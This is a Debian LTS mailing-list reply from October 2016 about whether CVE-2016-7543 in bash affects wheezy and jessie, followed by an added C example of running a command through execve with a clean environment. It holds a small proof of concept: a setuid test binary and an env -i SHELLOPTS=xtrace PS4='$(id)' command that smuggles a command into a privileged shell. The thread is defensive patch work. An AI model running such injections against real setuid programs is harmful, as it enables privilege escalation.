
Re: Wheezy update of bash?



Hi Ola,

2016-10-06 23:08 GMT+02:00 Ola Lundqvist <ola@inguza.com>:
> Hi Matthias and Balint
>
> I have tried to reproduce the problem described in the openwall email.
> However I cannot reproduce it. Have you been able to?
>
> On wheezy:
> ------------
> ola@tigereye:/$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> Thu Oct  6 20:54:07 UTC 2016
> ola@tigereye:/$ ls -la test
> -rwsr-xr-x 1 root root 6824 Oct  6 20:52 test
> ola@tigereye:/$ dpkg -l bash
> ...CUT...
> ii  bash           4.2+dfsg-0.1 amd64        GNU Bourne Again SHell
>
> On jessie:
> ola@tigereye:~/exploit$ env -i SHELLOPTS=xtrace PS4='$(id)' ./test
> Thu Oct  6 22:48:35 CEST 2016

When I set the default shell to bash it worked for me.
Please try with sudo dpkg-reconfigure dash.

> ola@tigereye:~/exploit$ dpkg -l bash
> ...CUT...
> ii  bash           4.3-11+b1    amd64        GNU Bourne Again SHell
>
> I think it may be because SHELLOPTS is a read-only variable.
>
> ola@tigereye:~/exploit$ SHELLOPTS=xtrace
> bash: SHELLOPTS: readonly variable
>
> Do you think I have made a mistake in the reproduction or is it so that the
> patch was actually not on a real problem (at least in Debian)?
>
> Not even if I change the code like this:
> ola@tigereye:~/exploit$ gcc -xc - -otest2 <<< 'int main() { setuid(0);
> system("/bin/bash -c /bin/date"); }'
> ola@tigereye:~/exploit$ ./test2
> Thu Oct  6 23:04:11 CEST 2016
> ola@tigereye:~/exploit$ set -x
> ola@tigereye:~/exploit$ ./test2
> uid=1000(ola) gid=1000(ola)
> groups=1000(ola),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev)./test2
> Thu Oct  6 23:04:18 CEST 2016

This runs the command passed in PS4, thus I consider this a reproduction.

Cheers,
Balint

>
> My conclusion is that there is no security hole. But I may be mistaken.
>
> Can anyone else reproduce the issue?
>
> Best regards,
>
> // Ola
>
> On 6 October 2016 at 12:29, Ola Lundqvist <ola@inguza.com> wrote:
>>
>> Hi Matthias
>>
>> I will look into this.
>>
>> // Ola
>>
>> On 6 October 2016 at 01:06, Matthias Klose <doko@debian.org> wrote:
>>>
>>> On 05.10.2016 16:02, Balint Reczey wrote:
>>> > Hello dear maintainer(s),
>>> >
>>> > the Debian LTS team would like to fix the security issues which are
>>> > currently open in the Wheezy version of bash:
>>> > https://security-tracker.debian.org/tracker/CVE-2016-7543
>>> >
>>> > Would you like to take care of this yourself?
>>>
>>> please go ahead.
>>>
>>> Matthias
>>>
>>
>>
>>
>> --
>>  --- Inguza Technology AB --- MSc in Information Technology ----
>> /  ola@inguza.com                    Folkebogatan 26            \
>> |  opal@debian.org                   654 68 KARLSTAD            |
>> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
>> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>>  ---------------------------------------------------------------
>>
>
>
>
> --
>  --- Inguza Technology AB --- MSc in Information Technology ----
> /  ola@inguza.com                    Folkebogatan 26            \
> |  opal@debian.org                   654 68 KARLSTAD            |
> |  http://inguza.com/                Mobile: +46 (0)70-332 1551 |
> \  gpg/f.p.: 7090 A92B 18FE 7994 0C36 4FE4 18A1 B1CF 0FE5 3DD9  /
>  ---------------------------------------------------------------
>
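
An added example, not part of the original thread or of any Debian patch: the test program above calls system() from a setuid binary, so bash receives the caller's SHELLOPTS and PS4. The hardened pattern below runs the same /bin/date command through execve() with a fixed environment; SAFE_ENV, env_has and run_clean are hypothetical names, and the PATH value is an assumption.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for the child. Nothing the caller set (SHELLOPTS, PS4,
 * BASH_ENV, ...) is inherited. The PATH value is an assumption. */
static char *const SAFE_ENV[] = {
    "PATH=/usr/sbin:/usr/bin:/sbin:/bin",
    NULL
};

/* Return 1 if variable `name` is present in the NULL-terminated envp. */
int env_has(char *const envp[], const char *name)
{
    size_t n = strlen(name);
    for (; *envp != NULL; envp++)
        if (strncmp(*envp, name, n) == 0 && (*envp)[n] == '=')
            return 1;
    return 0;
}

/* Run argv[0] via execve() with SAFE_ENV instead of system(), so no shell
 * parses the caller's environment. Returns the exit status, or -1. */
int run_clean(char *const argv[])
{
    int status;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, SAFE_ENV);
        _exit(127);              /* execve failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Same command as the thread's test program, run without a shell. */
    char *const cmd[] = { "/bin/date", NULL };
    return run_clean(cmd) == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
```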

